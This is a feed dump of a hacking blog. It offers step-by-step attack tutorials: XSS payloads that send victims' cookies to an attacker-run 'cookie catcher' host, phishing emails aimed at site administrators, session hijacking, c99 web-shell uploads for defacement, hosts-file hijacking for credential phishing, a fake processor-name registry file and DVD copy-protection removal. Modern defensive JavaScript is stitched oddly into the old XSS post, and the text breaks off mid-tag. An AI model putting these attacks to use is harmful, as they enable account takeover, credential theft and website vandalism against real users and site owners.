tag:blogger.com,1999:blog-2897447295594141612024-02-19T22:32:41.594-08:00Hacking | SkilzHacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.comBlogger71125tag:blogger.com,1999:blog-289744729559414161.post-10030626258198251052011-10-06T00:07:00.000-07:002011-10-06T00:21:13.515-07:00How to change the processor name<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-JiLYFx_4Y1Fokdwi4kC71tXZizjfxi9b6yb9NRvFKfJy-7NDdsPKsFdfmLmNe_-FDWCNF7RPJ3xhgltHmxVwmYjJkXaKtI6PQwBFUdC-lfyHIbc6EiOequd8YQJa0ryg0bgsDwu1y0/s1600/processor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-JiLYFx_4Y1Fokdwi4kC71tXZizjfxi9b6yb9NRvFKfJy-7NDdsPKsFdfmLmNe_-FDWCNF7RPJ3xhgltHmxVwmYjJkXaKtI6PQwBFUdC-lfyHIbc6EiOequd8YQJa0ryg0bgsDwu1y0/s320/processor.jpg" width="320" /></a></div><br />
<br />
<br />
Hello friends, today I am going to show you how to change your processor name with the help of the registry editor.<br />
<br />
Steps - Open Notepad, type the following bold and underlined text, and save it as anyfilename.reg<br />
<br />
Please check that the file extension is .reg.<br />
<br />
<br />
<u><b>Windows Registry Editor Version 5.00<br />
<br />
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]<br />
"Component Information"=hex:00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00<br />
"Identifier"="x86 Family 15 Model 1 Stepping 3"<br />
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00<br />
"ProcessorNameString"=" AMD(R) ATHLON 64 BIT FX 8.70GHz"<br />
"VendorIdentifier"="GenuineIntel"<br />
"FeatureSet"=dword:00073fff<br />
"~MHz"=dword:000006a3<br />
"Update Signature"=hex:00,00,00,00,04,00,00,00<br />
"Update Status"=dword:00000002</b></u><br />
<u><b><br />
</b></u>thanks/.....for reading this .....</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com6tag:blogger.com,1999:blog-289744729559414161.post-60142242773721530212011-07-17T10:20:00.000-07:002011-07-17T10:20:56.673-07:00XSS Tutorial<span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: red;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALY9Y3N4Tq6tU7tIK0oo0Urz2C6G4gkLANGW3EhR2Ro4q-uUw2wQfOuzWfqfIL0R4JRdaJXrkmrb2Q7HwOLO50aswMCnZMkaoo-ex-izpMahYkv72PgRG__pJa9LoLnju8PCUWF5Uovs/s1600/xss-attack.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALY9Y3N4Tq6tU7tIK0oo0Urz2C6G4gkLANGW3EhR2Ro4q-uUw2wQfOuzWfqfIL0R4JRdaJXrkmrb2Q7HwOLO50aswMCnZMkaoo-ex-izpMahYkv72PgRG__pJa9LoLnju8PCUWF5Uovs/s320/xss-attack.jpg" width="320" /></a></div><div style="text-align: center;"></div></span></span><br />
</span><br />
<span style="font-weight: bold;">Hello guys, today I will write a complete tutorial on XSS.<br />
<br />
First of all, XSS comes in 2 types: Persistent and Non-Persistent.<br />
<br />
For XSS we will use something called a Cookie Catcher.<br />
The question is: why would we need someone else's cookies?<br />
<br />
The answer is that we can change our browser's cookies to log in as them! So let's call it Session Hijacking.<br />
<br />
First go to a free hosting site like <a href="http://www.110mb.com/" target="_blank">http://www.110mb.com</a> or any other PHP hosting site and register there. Then download this cookie catcher and upload it.<br />
<br />
<span style="color: red;">Cookie Catcher</span>: <a href="http://adf.ly/1I5oz" target="_blank">http://adf.ly/1I5oz</a><br />
<br />
What does the cookie catcher do?<br />
It grabs the user's:<ul><li>Cookies</li>
<li>IP</li>
<li>Referral Link. Which Page is attached to that Link</li>
<li>Time And Date<br />
</li>
</ul><br />
<span style="font-size: medium;"><span style="color: red;">Get Vulnerable sites</span></span>:<br />
<br />
OK, first we need sites that are vulnerable to XSS so it will work on them.<br />
To test a site we need to add some code after the link.<br />
I will use this site, which many of you have probably seen before.<br />
<a href="http://adf.ly/Tdo3" target="_blank">http://adf.ly/Tdo3</a><br />
<br />
To test whether a site is vulnerable or not, you can add these codes:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><script>alert(document.cookie)</script></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>'><script>alert(document.cookie)</script></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><script>alert("Test")</script></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>'><script>alert("Test")</script></code></div></div><br />
Or a new one which I found out myself, in which you can inject HTML:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><body bgcolor="FF0000"></body></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe></code></div></div><br />
Then if we see a JavaScript popup like this:<br />
<br />
<img alt="[Image: i83028_popup.bmp]" border="0" src="http://016.img98.net/out.php/i83028_popup.bmp" /><br />
Or, if you used my test and saw the page's background go black or a Google page open inside that site, it means it is vulnerable to an XSS attack.<br />
<br />
In the end, if your site is <a href="http://www.example.com/" target="_blank">http://www.example.com</a><br />
The link to test it would be: <a href="http://www.example.com/index.php?id=" target="_blank">http://www.example.com/index.php?id=</a>"><script>alert(document.cookie)</script><br />
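<br />
Why each test string starts with a quote, and how output encoding neutralises all of them, as an added example (not code from the original post). The input-field template, the function names and the small tag scanner are assumptions made for illustration; the six inputs are the test strings listed above.<br />

```javascript
// Added example: a reflected value landing inside an HTML attribute.
// TEST_STRINGS are the test strings from the post; the templates and all
// function names are hypothetical.
const TEST_STRINGS = [
  '"><script>alert(document.cookie)</script>',
  "'><script>alert(document.cookie)</script>",
  '"><script>alert("Test")</script>',
  "'><script>alert(\"Test\")</script>",
  '"><body bgcolor="FF0000"></body>',
  '"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>',
];

// Vulnerable templates: the request parameter is pasted into the markup as-is.
const unsafeDouble = (v) => `<input name="id" value="${v}">`;
const unsafeSingle = (v) => `<input name='id' value='${v}'>`;

// Encode every character that can end an attribute value or start a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
const safeDouble = (v) => unsafeDouble(escapeHtml(v));
const safeSingle = (v) => unsafeSingle(escapeHtml(v));

// Small tag scanner: returns the names of the tags found in the markup.
// A quote only opens an attribute value directly after '=', and '>' inside
// a quoted value does not end the tag.
function listTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    let name = '';
    while (j < html.length && /[A-Za-z0-9\/]/.test(html[j])) name += html[j++];
    if (!name) { i++; continue; }
    let quote = null;
    let prev = name[name.length - 1];
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) {
        if (c === quote) { quote = null; prev = c; }
        continue;
      }
      if ((c === '"' || c === "'") && prev === '=') { quote = c; continue; }
      if (c === '>') break;
      if (!/\s/.test(c)) prev = c;
    }
    tags.push(name.toLowerCase());
    i = j + 1;
  }
  return tags;
}

// Indexes of TEST_STRINGS that produce markup beyond the single <input>.
function breakouts(render) {
  const hits = [];
  TEST_STRINGS.forEach((payload, i) => {
    const tags = listTags(render(payload));
    if (tags.length !== 1 || tags[0] !== 'input') hits.push(i);
  });
  return hits;
}

console.log('double-quoted attribute, raw    :', breakouts(unsafeDouble));
console.log('single-quoted attribute, raw    :', breakouts(unsafeSingle));
console.log('double-quoted attribute, encoded:', breakouts(safeDouble));
console.log('single-quoted attribute, encoded:', breakouts(safeSingle));
```

Only the strings whose leading quote matches the attribute's own delimiter escape the value, which is why the encoder has to cover both quote characters as well as the angle brackets.<br />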
<br />
<span style="font-size: medium;"><span style="color: red;">Persistent XSS</span>:</span><br />
<br />
In this method we will grab the victim's cookies stealthily, without raising suspicion.<br />
Now assume we have a forum which has HTML enabled, or a site with a comment page which is vulnerable to XSS.<br />
OK, now let's go to this site: <a href="http://adf.ly/1I6ns" target="_blank">http://adf.ly/1I6ns</a><br />
Now test and see if the XSS vulnerability test works on it.<br />
It does! And you are getting one of the vulnerability's symptoms. So now let's try to grab its cookies. If there is a box to type in or submit, add this:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script></code></div></div><br />
Submit that post in the forum or the comment box. It is also good to add something before the code, like: hey i got a problem logging in???<br />
so they won't suspect you.<br />
<br />
Refresh the page. Now, in the same directory where you saved your cookie catcher.php, look for cookies.html, a newly created file that shows you the cookies. For example, if your cookie catcher link is: <a href="http://www.example.com/cookie" target="_blank">http://www.example.com/cookie</a> catcher.php<br />
the container of the cookies would be: <a href="http://www.example.com/cookies.html" target="_blank">http://www.example.com/cookies.html</a><br />
<br />
Now visit cookies.html and you will see the session cookie!<br />
<br />
There is another way to do a drive-by cookie grab: add this code and post it:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code><iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe></code></div></div><br />
Then post it in the forum or the comment box.<br />
This will open an iframe in the page, which will allow you to have the same page inside that website. If you don't know about iframes, make a new HTML file on your computer and just add<br />
<br />
<span style="color: red;"><iframe src="www.google.com"></iframe></span> and you will understand iframes better.<br />
<br />
Of course, the site needs to use cookies! A blank JavaScript popup means you need to go to another site.<br />
<br />
<span style="font-size: medium;"><span style="color: red;">Non-Persistent XSS</span>:</span><br />
<br />
OK, in this method we will make the victim admin go to our link. First we will pick an XSS-vulnerable site. For this method we need a search.php page that is vulnerable to XSS and uses cookies. In the vulnerable search.php, type this into the search textbox:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code><script>alert(document.cookie)</script></code></div></div><br />
And click the search button. If you see a JavaScript popup, it means the page is vulnerable to a Non-Persistent XSS attack. OK, now we will do something similar.<br />
I will use this link for this method: <a href="http://adf.ly/1I6ns" target="_blank">http://adf.ly/1I6ns</a><br />
Now after search.php?search= add this:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script></code></div></div><br />
Now go to <a href="http://www.spam.com/" target="_blank">http://www.spam.com</a> and shorten the whole page's link. Try to find a site administrator's e-mail on that vulnerable website and send a fake mail from an online fake mailer like this one: <a href="http://adf.ly/1I73J" target="_blank">http://adf.ly/1I73J</a><br />
<br />
<span style="color: red;">Now in the body just say something fake like</span>: Hey i found a huge bug in your website! and give him the shortened link of the search.php page with the code added after it. The shortened link will mask it, and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookie catcher. No matter what he does, even if he changes his password, you can still log in as him.<br />
<br />
<span style="font-size: medium;"><span style="color: red;">Session Hijacking</span>:</span><br />
<br />
OK, now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that site's admin login or its main page and delete ALL of your cookies for that site. Now go to your cookies.html page and copy everything after Cookie: into Notepad. The <span style="color: red;">;</span> separates cookies from each other, so first copy the code before the <span style="color: red;">;</span> .<br />
Now go to that vulnerable website and clear the link. Instead of that link add this:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Javascript:void(document.cookie="")</code></div></div><br />
or for an example:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")</code></div></div><br />
Then visit the link. Do this with all of the cookies and refresh the page, and you are logged in as administrator.<br />
So now go to your Admin Panel and upload your Deface Page.<br />
<br />
Good Luck. Now you have Hacked a Website with XSS.<br />
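<br />
Both the Persistent XSS step and the Session Hijacking step depend on the session cookie being readable through document.cookie. The added example below (not code from the original post) parses Set-Cookie headers, shows what a script on the page could read, and audits the session cookie's flags. The header lines are constructed and PHPSESSID is an assumed session cookie name; the __utma value is the one quoted in the post.<br />

```javascript
// Added example: which cookies can script on the page read, and is the
// session cookie protected? All header lines are constructed samples.
const UTMA = '__utma=255621336.1130089386.1295743598.1305934653.1305950205.86';

const weakHeaders = [
  'Set-Cookie: PHPSESSID=constructed-session-id; Path=/',
  `Set-Cookie: ${UTMA}; Path=/`,
];
const hardenedHeaders = [
  'Set-Cookie: PHPSESSID=constructed-session-id; Path=/; HttpOnly; Secure; SameSite=Lax',
  `Set-Cookie: ${UTMA}; Path=/`,
];

// Parse one Set-Cookie header line into name, value and security flags.
function parseSetCookie(line) {
  const raw = line.replace(/^set-cookie:\s*/i, '');
  const [pair, ...attrs] = raw.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    const key = k.trim().toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = v.trim();
  }
  return cookie;
}

// The string document.cookie would return to any script running on the page:
// every cookie that is not HttpOnly, joined as "name=value; name=value".
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Report missing protections on the cookies that carry the login session.
function auditSessionCookies(headers, sessionNames) {
  const findings = [];
  for (const c of headers.map(parseSetCookie)) {
    if (!sessionNames.includes(c.name)) continue;
    if (!c.httpOnly) findings.push(`${c.name}: missing HttpOnly (readable via document.cookie)`);
    if (!c.secure) findings.push(`${c.name}: missing Secure`);
    if (!c.sameSite) findings.push(`${c.name}: missing SameSite`);
  }
  return findings;
}

console.log('weak     ->', scriptVisibleCookies(weakHeaders));
console.log('hardened ->', scriptVisibleCookies(hardenedHeaders));
console.log(auditSessionCookies(weakHeaders, ['PHPSESSID']));
```

HttpOnly keeps the session identifier out of document.cookie but does not remove the injection itself, so it complements output encoding rather than replacing it.<br />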
</span>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-25752346406981894202011-07-17T00:45:00.000-07:002011-07-17T00:45:12.203-07:00High Compression 4GB DVD to 100MB File<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcxLPtI5HPnsEBs15fe5dbMdfz7dmW1wLkM54qXpLbojT-LGm-o4MGD-Ieyo6DLdWER5Bs79uAH0Ofw1nbfZDp3ISefTxAmJmUnScK51Tp-3o3VpcPvo0FYSYapQyey9RDHcUA-qCiVOU/s1600/funnel-file-compression.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcxLPtI5HPnsEBs15fe5dbMdfz7dmW1wLkM54qXpLbojT-LGm-o4MGD-Ieyo6DLdWER5Bs79uAH0Ofw1nbfZDp3ISefTxAmJmUnScK51Tp-3o3VpcPvo0FYSYapQyey9RDHcUA-qCiVOU/s320/funnel-file-compression.jpg" width="192" /></a></div> <br />
<div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><span style="font-family: "Times New Roman","serif"; font-size: 12pt;">Install all the software (download them; all are freeware):<br />
1) DivX Create Bundle<br />
2) DVD2AVI<br />
3) DVD Decrypter<br />
4) LAME ACM Codec<br />
5) Virtual Dub<br />
<br />
</span></div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><span style="font-family: "Times New Roman","serif"; font-size: 12pt;">Step (1): Insert your DVD into the drive and launch DVD Decrypter. DVD Decrypter will detect the DVD, and its file contents will be displayed in the right pane. Now go to File > Browse and select the destination for the ripped VOB files. Keep in mind that the destination must have enough free space to store the contents of the entire DVD.<br />
<br />
Step (2): After choosing the destination, click on File > Decrypt to start the decryption process. DVD Decrypter removes the Macrovision protection by default, and you can set it to remove the region code as well by going to Tools > IFO > Region > Patch > Region Free. These are necessary for the next step. After the DVD ripping process is completed, close DVD Decrypter.<br />
<br />
Step (3): Next, launch DVD2AVI. Go to File > Open. Make sure the correct track number is selected in the Audio menu. You need to find the correct track number because most DVDs have multiple audio tracks in different languages. This can be checked by selecting one track at a time and playing it. Also click on the Audio menu, navigate to “48>44.1KHz”, and select Off. Go to Help > SIMD Technology and select all the optimizations supported by your processor. Now go to File > Save As AVI.<br />
<br />
Step (4): Decide on a file name and choose a location with enough free space. You will now be prompted to choose a video compressor. Choose “DivX 6.x.x” from the drop-down menu where you can select the video compressor.<br />
<br />
Step (5): Under the Certification Profiles, you can choose an appropriate preset profile such as High Definition, Home Theatre, Portable, Handheld, and Unconstrained. When you choose one of the above profiles, it is virtually guaranteed that the encoded DivX file will be playable on any standalone DivX-certified player. Click on Settings. You can select a bitrate of your choice. A higher bitrate means a larger file size and better quality, while a lower bitrate means a smaller file size and lower image quality.<br />
<br />
Step (6): In the Codec tab, you can set the Encoding mode. The default setting is a good trade-off between quality and compression, but if you wish to control the file size, you can choose your own mode such as High Performance, Better Quality, etc. Click on OK and then on Save to start the video demultiplexing process. This will take some time depending on the speed of your computer. At the end of this process, you’ll have an AVI file and a WAV file.<br />
<br />
Step (7): We now get to the creation of the DivX file, which means putting together the video (AVI) and audio (WAV) files that were created in the previous step. Launch Virtual Dub. Under File > Open, browse to the folder where the AVI and WAV files are stored. Select the AVI file and click Open.<br />
<br />
Step (8): Click on the Audio menu and click “Full Processing Mode”. Click again on the Audio menu and select “WAV Audio”. You will be prompted to open a WAV file. Select the WAV file you created earlier and click Open. Click on the Audio menu and then on Compression. Select “MPEG Layer-3” from the left pane and then select “128 KBit/s, 48,000Hz, Stereo” in the right pane. Click OK.<br />
<br />
Step (9): Select Interleaving from the Audio menu. Then, select the “ms” radio button and input “500” into the “Interleave audio every” dialog box. Click OK. Again, in the Audio menu, select Volume. Check the box and move the slider to 200 percent. Click OK.<br />
<br />
Step (10): From the Video menu, select Direct Stream Copy.<br />
<br />
Step (11): Go to File > Save As. Enter a file name of your choice at a location of your choice, and click OK. This, again, will take some time, but not as much as the video encoding using DVD2AVI. After the process is complete, you’ll have a DivX backup of your DVD movie.<br />
<br />
Step (12): All that’s left now is to burn the DivX backup to a CD or DVD using your DVD writer.<br />
<br />
<br />
</span></div><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><br />
</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com3tag:blogger.com,1999:blog-289744729559414161.post-26267371898406996502011-06-01T03:10:00.000-07:002011-06-27T20:13:52.748-07:00Shell Uploading<div dir="ltr" style="text-align: left;" trbidi="on"><br /><span class="Apple-style-span" style="color: #cc0000;"><span class="Apple-style-span" style="font-size: large;">What is a Shell?</span></span><br /><br />A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.<br />This is a plain c99 shell, BUT it is undetected, so you should not get a warning from an antivirus if you download it. (Update: not undetected anymore.)<br />I am not going to explain SQLi, just how to deface.<br />SQL tutorial: http://hackingmania.com/Blog/sql-injection-and-defacement-for-beginners-tutorial<br />So now go get yourself a vulnerable site, hack it and get the admin login details and the admin page address.<br />Now log in to the admin page with the admin details you got.<br />Go through the admin page until you find a place where you can upload a picture (usually a picture).<br />Now you have to upload the shell. 
If you don’t get an error, it is all good.<br />Now to find the shell:<br />Go through the site until you find any image and, if you are using Firefox, right-click on it and choose “Copy Image Location”.<br />Open a new tab and paste it there.<br />It will probably look something like this:<br />http://www.example.com/images/photonamehere.jpg<br />Now that we know that, change “/photonamehere.jpg” to “/c99ud.php.jpg” (without quotes).<br />Now a page will come up looking like this:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FRhmxTb09yM15PM_QGVI36usgPkdfB00g1TzKToQaAWo0M7R_f83gQHR-rhGR9T1NUx4NWzzbC4mofmY9cAEJvhJlMoTHrXSAnBjIsUkBus4IKTDMiOeKGBDomy7yd-UB9tf5W5YS0E/s1600/igz03k.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FRhmxTb09yM15PM_QGVI36usgPkdfB00g1TzKToQaAWo0M7R_f83gQHR-rhGR9T1NUx4NWzzbC4mofmY9cAEJvhJlMoTHrXSAnBjIsUkBus4IKTDMiOeKGBDomy7yd-UB9tf5W5YS0E/s320/igz03k.jpg" width="320" /></a></div><br />It will probably not look exactly like that, but it will look similar.<br />Now you have access to all the files on the site.<br />What you want to do now is<br />find index.php or whatever the main page is, and replace it with the HTML code for your deface page.<br />Then you can either delete all the other files OR (and I recommend this) let it redirect to the main page.<br />Keep in mind:<br />• Change Admin Username and Password<br />• The people have FTP access so you need to change that password too.<br />• Always use a Proxy or VPN<br /></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-9909590148218259652011-06-01T02:44:00.000-07:002011-06-27T20:13:52.748-07:00Desktop Phishing Hack<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" 
style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px;"></span><br /><div style="text-align: justify;"><b>It is an advanced form of phishing. Kindly read my previous post on normal phishing before proceeding. </b><b>The difference between phishing and desktop phishing is as </b><b>follows.</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>In phishing:</b></div><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXyZKZY_0I/AAAAAAAAAF4/ndWstZe13Fg/s1600/phishing.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="173" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXyZKZY_0I/AAAAAAAAAF4/ndWstZe13Fg/s200/phishing.jpg" width="200" /></a><b></b><br /><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-weight: normal;"><b>1. </b></span><span class="Apple-style-span" style="font-weight: normal;">The attacker convinces the victim to click on a link to a fake login page that resembles a genuine login page.</span></b></div><br /><div style="text-align: justify;"><b>2</b>. The victim enters his credentials in the fake login page, and they go to the attacker.</div><div style="text-align: justify;"><b>3</b>. The victim is then redirected to an error page or the genuine website, depending on the attacker.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">But the main drawback of phishing is that the victim can easily differentiate between the fake and the real login page by looking at the domain name. 
We can overcome this in desktop phishing by spoofing the domain name.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>In desktop phishing:</b></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXs5qeW3nI/AAAAAAAAAF0/qXylv8Na0LE/s1600/dphising.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="201" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXs5qeW3nI/AAAAAAAAAF0/qXylv8Na0LE/s320/dphising.jpg" width="320" /></a></div><div style="text-align: justify;"><b>1</b>. The attacker sends an executable/batch file to the victim, and the victim is supposed to double-click on it. The attacker's job is done.</div><div style="text-align: justify;"><b>2</b>. The victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim does not notice.</div><div style="text-align: justify;"><b>3</b>. The rest is the same as in normal phishing.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>What is the Hosts File?</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The hosts file is a text file containing domain names and the IP addresses associated with them.</div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;">Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\</span></div><div style="text-align: justify;">Whenever we visit any website, say www.anything.com, a query is sent to the Domain Name Server (DNS) to look up the IP address associated with that website/domain. 
But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.</div><div class="separator" style="clear: both; text-align: justify;"><a href="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRMXS0EuI/AAAAAAAAAFs/pMwyJSH8zNQ/s1600/host.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRMXS0EuI/AAAAAAAAAFs/pMwyJSH8zNQ/s320/host.jpg" width="320" /></a></div><div style="text-align: justify;"><b><br /></b></div><div style="text-align: justify;"><b>What is the attack?</b></div><div style="text-align: justify;">I hope you now have an idea of how modification of this hosts file on the victim's computer can be misused. We need to modify the victim's hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he is directed to our fake login page, and the domain name in the URL box remains genuine, as typed by the victim. Hence the domain name is spoofed.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-size: medium;">Two steps to perform the attack:</span></b></div><div style="text-align: justify;"><b>1. Create and host phishing page on your computer.</b></div><div style="text-align: justify;"><b>2. 
Modify victim's hosts file</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b style="background-color: white;"><span class="Apple-style-span" style="color: #990000;">Step 1:</span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="color: #990000;"><b><br /></b></span></div><div style="text-align: justify;">Web hosting sites like 110mb.com, ripway.com etc., where we usually upload our phishing page, do not provide an IP that points to your website (like www.anything.110mb.com). An IP address points to a web server and not a website. So we need to host the phishing page on our computer using web server software like WAMP or XAMPP.</div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;"><b>Kindly read my simple tutorial on setting up an XAMPP web server <a href="http://www.explorehacking.com/2011/01/setting-webserver-host-webpages-on-your.html">here</a> and this step will be clear to you.</b></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b><span class="Apple-style-span" style="color: #990000;">Step 2. </span>This step can be performed in two different ways. </b></div><div style="text-align: justify;"><b><br /></b></div><div style="text-align: justify;"><b>Method 1 - Send the victim a zip file containing a modified hosts file. When the zip file is clicked, it automatically replaces the victim's original hosts file with the modified hosts file.</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Copy your hosts file and paste it anywhere. 
Modify it as needed: edit it with any text editor and associate your public IP address with the domain you wish, as shown.</div><div class="separator" style="clear: both; text-align: justify;"><a href="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRRUOcpQI/AAAAAAAAAFw/3vk_kLZb6II/s1600/host1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRRUOcpQI/AAAAAAAAAFw/3vk_kLZb6II/s320/host1.jpg" width="305" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In this case, when the victim visits gmail.com, he is taken to the website hosted on IP 'xxx.xxx.xxx.xxx'. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location <span class="Apple-style-span" style="background-color: #f3f3f3;">C:\Windows\system32\drivers\etc</span> and the victim's hosts file gets replaced by our modified hosts file.</div><div class="separator" style="clear: both; text-align: justify;"><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ2dv4T-I/AAAAAAAAAFU/WRrBEK1vwaw/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ2dv4T-I/AAAAAAAAAFU/WRrBEK1vwaw/s400/1.jpg" width="217" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ6DkQg3I/AAAAAAAAAFY/wP0x4S-5KXM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ6DkQg3I/AAAAAAAAAFY/wP0x4S-5KXM/s400/2.jpg" width="400" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a 